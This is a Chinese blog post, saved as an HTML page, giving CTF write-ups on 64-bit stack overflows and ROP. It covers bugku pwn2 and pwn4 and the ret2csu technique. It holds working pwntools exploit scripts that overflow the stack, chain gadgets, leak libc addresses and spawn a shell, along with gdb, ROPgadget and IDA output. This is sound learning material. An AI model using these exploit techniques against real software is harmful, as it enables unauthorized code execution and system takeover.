
<!DOCTYPE html>
<html lang="" class="loading">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>ROP之64位栈溢出 - 赵丰年-全世界都知道我很低调</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="赵丰年,"> 
    <meta name="description" content="写在前面之前把32位程序的基本溢出操作和ROP手段总结完了，现在把64位程序栈溢出和基本ROP手法总结下，用以备忘。依然由简入深。
bugku pwn2首先看保护机制什么也没开，64位程序扔IDA有,"> 
    <meta name="author" content="赵丰年de博客"> 
    <link rel="alternative" href="atom.xml" title="赵丰年-全世界都知道我很低调" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">赵丰年-全世界都知道我很低调</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="https://xiy-blogs.github.io"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">ROP之64位栈溢出</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">ROP之64位栈溢出</h1>
        <div class="stuff">
            <span>三月 05, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>


        </div>
        <div class="content markdown">
            <h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h2><p>之前把32位程序的基本溢出操作和ROP手段总结完了，现在把64位程序栈溢出和基本ROP手法总结下，用以备忘。依然由简入深。</p>
<h2 id="bugku-pwn2"><a href="#bugku-pwn2" class="headerlink" title="bugku pwn2"></a>bugku pwn2</h2><p>首先看保护机制<br><img src="https://i.loli.net/2020/03/05/lfReSuYvD2B95sO.png" alt="g1.png"><br>什么也没开，64位程序<br>扔IDA<br><img src="https://i.loli.net/2020/03/05/3o5BFGczV7gL4Xn.png" alt="g2.png"><br>有一个栈溢出漏洞，还有个getshell函数，我们看下它的伪代码<br><img src="https://i.loli.net/2020/03/05/3o5BFGczV7gL4Xn.png" alt="g2.png"><br>果然能直接拿shell,得flag。<br>这里说一下，linux_64与linux_86的区别主要有两点：首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff，否则会抛出异常。其次是函数参数的传递方式发生了改变，x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI, RSI, RDX, RCX, R8和 R9中，如果还有更多的参数的话才会保存在栈上。（copy的蒸米大佬的）<br>这里，算下偏移，有些和32位不大一样<br>直到输入制造的数据都是一样的<br><img src="https://i.loli.net/2020/03/05/vTMAlnV2SNuaptL.png" alt="g4.png"><br>看，红线部分，不再是0x414141那样了，这是因为使用的内存地址大于了0x00007fffffffffff，我们需要查看栈顶获得跳转的地址，从而计算溢出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x&#x2F;gx $rsp</span><br><span class="line">0x7fffffffdb98:	0x4841413241416341</span><br></pre></td></tr></table></figure>
<p>由于是小端计数，所以后八位会是我们的字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ pattern offset 0x41416341</span><br><span class="line">1094804289 found at offset: 56</span><br></pre></td></tr></table></figure>
<p>事实上，直接全输入也可以</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ pattern offset 0x4841413241416341</span><br><span class="line">5206514328315978561 found at offset: 56</span><br></pre></td></tr></table></figure>
<p>ok，然后看脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">r &#x3D; remote(&#39;114.116.54.89&#39;,10003)</span><br><span class="line">payload &#x3D; &#39;a&#39;*56 + p64(0x400751)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="bugku-pwn4"><a href="#bugku-pwn4" class="headerlink" title="bugku pwn4"></a>bugku pwn4</h2><p>还是先检查保护机制<br><img src="https://i.loli.net/2020/03/05/6qP21etUDBZOVIw.png" alt="g4 _1_.png"><br>同样是64位程序，未开启任何防护，扔IDA<br><img src="https://i.loli.net/2020/03/06/3YXIFzVsTxaOgm5.png" alt="g18.png"><br>发现栈溢出，然后看字符串<br><img src="https://i.loli.net/2020/03/05/iHKNumTtALv4bsY.png" alt="g6.png"><br><img src="http://s1.wailian.download/2020/03/05/g7.png" alt="g7.png"><br>虽然没有”/bin/sh”但是有$0,同样可以拿shell，而且左边可以看到system函数<br>但是我在ROPgadget中查不到它的地址，只好自己推算，从地址开始，经历31个字符到$0所以其地址为0x060111f，然后注意<br>64位程序，参数不在栈中，而在寄存器里，所以我们需要pop它到rdi,先找个gadget</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary pwn4 --only &#39;pop|ret&#39; | grep &#39;rdi&#39;</span><br><span class="line">0x00000000004007d3 : pop rdi ; ret</span><br></pre></td></tr></table></figure>
<p>ok，看脚本`</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">r &#x3D; remote(&#39;114.116.54.89&#39;,10004)</span><br><span class="line">sh &#x3D; 0x060111f</span><br><span class="line">sys &#x3D; 0x400570</span><br><span class="line">pop_ret &#x3D; 0x4007d3</span><br><span class="line">payload &#x3D; &#39;a&#39;*24 + p64(pop_ret) + p64(sh) + p64(sys)</span><br><span class="line">r.recvuntil(&#39;me&#39;)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="万能gadgets"><a href="#万能gadgets" class="headerlink" title="万能gadgets"></a>万能gadgets</h2><h3 id="ret2csu"><a href="#ret2csu" class="headerlink" title="ret2csu"></a>ret2csu</h3><p>先贴下源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line">void vulnerable_function() &#123;</span><br><span class="line">    char buf[128];</span><br><span class="line">    read(STDIN_FILENO, buf, 512);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, char** argv) &#123;</span><br><span class="line">    write(STDOUT_FILENO, &quot;Hello, World\n&quot;, 13);</span><br><span class="line">    vulnerable_function();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>看下保护措施</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] &#39;&#x2F;home&#x2F;xiy&#x2F;\xe4\xb8\x8b\xe8\xbd\xbd&#x2F;pwn&#x2F;ret2csu&#39;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<p>嗯哼，开始说题<br>看看IDA<br><img src="https://i.loli.net/2020/03/06/yXNcrouTMxYwHWP.png" alt="g13.png"><br><img src="https://i.loli.net/2020/03/06/p5Ijr4tFvDJlHcd.png" alt="g115.png"><br>无system，无‘bin、sh’，可构造ROP很少，我们需要用ret2csu去做</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>在 64 位程序中，函数的前 6 个参数是通过寄存器传递的，但是大多数时候，我们很难找到每一个寄存器对应的 gadgets。 这时候，我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。这个函数是用来对 libc 进行初始化操作的，而一般的程序都会调用 libc 函数，所以这个函数一定会存在。在IDA看下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">.text:0000000000400590 ; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; S U B R O U T I N E &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">.text:0000000000400590</span><br><span class="line">.text:0000000000400590</span><br><span class="line">.text:0000000000400590 ; void _libc_csu_init(void)</span><br><span class="line">.text:0000000000400590                 public __libc_csu_init</span><br><span class="line">.text:0000000000400590 __libc_csu_init proc near               ; DATA XREF: _start+16↑o</span><br><span class="line">.text:0000000000400590 ; __unwind &#123;</span><br><span class="line">.text:0000000000400590                 push    r15</span><br><span class="line">.text:0000000000400592                 push    r14</span><br><span class="line">.text:0000000000400594                 mov     r15, rdx</span><br><span class="line">.text:0000000000400597                 push    r13</span><br><span class="line">.text:0000000000400599                 push    r12</span><br><span class="line">.text:000000000040059B                 lea     r12, __frame_dummy_init_array_entry</span><br><span class="line">.text:00000000004005A2                 push    rbp</span><br><span class="line">.text:00000000004005A3                 lea     rbp, __do_global_dtors_aux_fini_array_entry</span><br><span class="line">.text:00000000004005AA                 push    rbx</span><br><span class="line">.text:00000000004005AB                 mov     r13d, edi</span><br><span class="line">.text:00000000004005AE                 mov     r14, rsi</span><br><span class="line">.text:00000000004005B1                 sub     rbp, r12</span><br><span class="line">.text:00000000004005B4                 sub     rsp, 8</span><br><span class="line">.text:00000000004005B8                 sar     rbp, 3</span><br><span class="line">.text:00000000004005BC                 call    _init_proc</span><br><span class="line">.text:00000000004005C1                 test    rbp, rbp</span><br><span class="line">.text:00000000004005C4                 jz      short loc_4005E6</span><br><span class="line">.text:00000000004005C6                 xor     ebx, ebx</span><br><span class="line">.text:00000000004005C8                 nop     dword ptr [rax+rax+00000000h]</span><br><span class="line">.text:00000000004005D0</span><br><span class="line">.text:00000000004005D0 loc_4005D0:                             ; CODE XREF: __libc_csu_init+54↓j</span><br><span class="line">.text:00000000004005D0                 mov     rdx, r15</span><br><span class="line">.text:00000000004005D3                 mov     rsi, r14</span><br><span class="line">.text:00000000004005D6                 mov     edi, r13d</span><br><span class="line">.text:00000000004005D9                 call    qword ptr [r12+rbx*8]</span><br><span class="line">.text:00000000004005DD                 add     rbx, 1</span><br><span class="line">.text:00000000004005E1                 cmp     rbp, rbx</span><br><span class="line">.text:00000000004005E4                 jnz     short loc_4005D0</span><br><span class="line">.text:00000000004005E6</span><br><span class="line">.text:00000000004005E6 loc_4005E6:                             ; CODE XREF: __libc_csu_init+34↑j</span><br><span class="line">.text:00000000004005E6                 add     rsp, 8</span><br><span class="line">.text:00000000004005EA                 pop     rbx</span><br><span class="line">.text:00000000004005EB                 pop     rbp</span><br><span class="line">.text:00000000004005EC                 pop     r12</span><br><span class="line">.text:00000000004005EE                 pop     r13</span><br><span class="line">.text:00000000004005F0                 pop     r14</span><br><span class="line">.text:00000000004005F2                 pop     r15</span><br><span class="line">.text:00000000004005F4                 retn</span><br><span class="line">.text:00000000004005F4 ; &#125; &#x2F;&#x2F; starts at 400590</span><br><span class="line">.text:00000000004005F4 __libc_csu_init endp</span><br></pre></td></tr></table></figure>
<p>看这段gadgets(gadget1)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">.text:00000000004005E6</span><br><span class="line">.text:00000000004005E6 loc_4005E6:                             ; CODE XREF: __libc_csu_init+34↑j</span><br><span class="line">.text:00000000004005E6                 add     rsp, 8</span><br><span class="line">.text:00000000004005EA                 pop     rbx</span><br><span class="line">.text:00000000004005EB                 pop     rbp</span><br><span class="line">.text:00000000004005EC                 pop     r12</span><br><span class="line">.text:00000000004005EE                 pop     r13</span><br><span class="line">.text:00000000004005F0                 pop     r14</span><br><span class="line">.text:00000000004005F2                 pop     r15</span><br><span class="line">.text:00000000004005F4                 retn</span><br><span class="line">.text:00000000004005F4 ; &#125; &#x2F;&#x2F; starts at 400590</span><br><span class="line">.text:00000000004005F4 __libc_csu_init endp</span><br></pre></td></tr></table></figure>
<p>我们可以利用栈溢出来控制rbx,rbp,r12,r13,r14,r15的值<br>然后看这一段(gadget2)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.text:00000000004005D0 loc_4005D0:                             ; CODE XREF: __libc_csu_init+54↓j</span><br><span class="line">.text:00000000004005D0                 mov     rdx, r15</span><br><span class="line">.text:00000000004005D3                 mov     rsi, r14</span><br><span class="line">.text:00000000004005D6                 mov     edi, r13d</span><br></pre></td></tr></table></figure>
<p>我们可以把第一段中，r15的值给rdx,把r14的值给rsi，把r13的值给edi,此时rdi的高32位寄存器中值为0，所以我们也可以控制rdi的值,而在64位程序中，rdi为第一个参数的存放寄存器，rsi为第二个参数，rdx为第三个参数。<br>看这一段（也属于gadget2）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.text:00000000004005D9                 call    qword ptr [r12+rbx*8]</span><br><span class="line">.text:00000000004005DD                 add     rbx, 1</span><br><span class="line">.text:00000000004005E1                 cmp     rbp, rbx</span><br><span class="line">.text:00000000004005E4                 jnz     short loc_4005D0</span><br></pre></td></tr></table></figure>
<p>它会通过call指令跳转到r12（rbx为0）;会判断rbx+1是否和rbp相等，不相等则重新执行第二个gadgets,我们可以设置rbp为1，让他不再重复执行<br>简单来说还是通过控制寄存器来调用系统函数<br>做题思路：</p>
<pre><code>利用栈溢出执行 libc_csu_gadgets 获取 write 函数地址，并使得程序重新执行 main 函数
根据 libcsearcher 获取对应 libc 版本以及 execve 函数地址
再次利用栈溢出执行 libc_csu_gadgets 向 bss 段写入 execve 地址以及 &apos;/bin/sh’ 地址，并使得程序重新执行 main 函数。
再次利用栈溢出执行 libc_csu_gadgets 执行 execve(&apos;/bin/sh&apos;) 获取 shell。</code></pre><p>贴张b站yichen大佬做题的堆栈结构图<br><img src="https://i.loli.net/2020/03/05/R2praGbHfjMQ7cI.png" alt="2020-03-05 19-41-39 的屏幕截图.png"><br>这只是第一个payload的堆栈结构。其余的差不多</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import *</span><br><span class="line"></span><br><span class="line">elf &#x3D; ELF(&#39;.&#x2F;ret2csu&#39;)</span><br><span class="line">r &#x3D; process(&#39;.&#x2F;ret2csu&#39;)</span><br><span class="line"></span><br><span class="line">write_got &#x3D; elf.got[&#39;write&#39;]</span><br><span class="line">read_got &#x3D; elf.got[&#39;read&#39;]</span><br><span class="line">main_addr &#x3D; elf.symbols[&#39;main&#39;]</span><br><span class="line">bss_base &#x3D; elf.bss()</span><br><span class="line">gadget1 &#x3D; 0x4005ea</span><br><span class="line">gadget2 &#x3D; 0x4005d0</span><br><span class="line">offset_padding &#x3D; &#39;a&#39;*136</span><br><span class="line"></span><br><span class="line">def csu(rbx,rbp,r12,r13,r14,r15,ret):</span><br><span class="line">    payload &#x3D; offset_padding</span><br><span class="line">    payload +&#x3D; p64(gadget1) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)</span><br><span class="line">    payload +&#x3D; p64(gadget2)</span><br><span class="line">    payload +&#x3D; &#39;a&#39;*56#保证能回到main pop用了6*8 加上add rsp的8位</span><br><span class="line">    payload +&#x3D; p64(ret)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    sleep(1)</span><br><span class="line">r.recvuntil(&#39;Hello, World\n&#39;)</span><br><span class="line">csu(0,1,write_got,8,write_got,1,main_addr)#构造write(1,write_got,8)返回main</span><br><span class="line"></span><br><span class="line">write_addr &#x3D; u64(r.recv(8))</span><br><span class="line">libc &#x3D; LibcSearcher(&#39;write&#39;,write_addr)#寻找libc库版本</span><br><span class="line">libc_base &#x3D; write_addr - libc.dump(&#39;write&#39;)#计算基地址</span><br><span class="line">execve_addr &#x3D; libc_base + libc.dump(&#39;execve&#39;)#构造execve的地址</span><br><span class="line"></span><br><span class="line">r.recvuntil(&#39;Hello, World\n&#39;)</span><br><span class="line">csu(0,1,read_got,16,bss_base,0,main_addr)</span><br><span class="line">r.send(p64(execve_addr) + &#39;&#x2F;bin&#x2F;sh\0x00&#39;)</span><br><span class="line">r.recvuntil(&#39;Hello, World\n&#39;)</span><br><span class="line">csu(0,1,bss_base,0,0,bss_base + 8,main_addr)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>需要注意的是，我这里gadget1是pop指令，所以在构造rop时，应该依次为第三个参数，第二个参数，第一个参数，而mov指令的话则是从前往后。<br>大家可以看下b站yichen师傅的讲解，很详细很强！</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src="https://link.hhtjim.com/163/25706279.mp3">
            </audio>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='9795acb241b5abfffb0a'
        data-cs='660e7056618084a8a8046e8e2e9e78787cdb23cf'
        data-r='XIY-blogs.github.io'
        data-o='XIY-blogs'
        data-a='XIY-blogs'
        data-d='false'
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
